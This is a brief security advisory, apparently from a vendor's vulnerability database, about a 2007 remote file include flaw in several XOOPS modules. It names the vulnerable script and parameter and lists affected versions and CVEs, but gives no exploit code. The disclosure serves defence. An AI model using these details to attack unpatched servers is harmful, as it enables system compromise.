Release DateJul 04, 2007 |
Severitylow |
ImpactSystem compromise. |
DescriptionMultiple XOOPS modules have a remote file include vulnerability. A remote attacker could execute an arbitrary script on the web server with the privileges of the server, via a specially crafted URL request to the 'spaw_control.class.php' script, using the 'spaw_root' parameter to specify a malicious PHP file from a remote system. |
Affected ProductsXT-Conteudo (module for Xoops) version 1.52 and prior.Tiny Content (module for Xoops) version 1.5 and prior. Cjay Content (module pour Xoops) version 3 and prior. WiwiMod (module pour Xoops) version 0.4 and prior. iContent (module for XOOPS) version 4.5 and prior. |
Recommended ActionsCurrently we are not aware of any official supplied fix for this issue. |
Coverage IPS
VCM |
Common Vulnerabilities and Exposures (CVE)CVE-2007-3057CVE-2007-3220 CVE-2007-3221 CVE-2007-3237 CVE-2007-3289 |
Reference/shttp://www.securityfocus.com/bid/24470 (BugTraq)http://www.securityfocus.com/bid/24302 (BugTraq) |
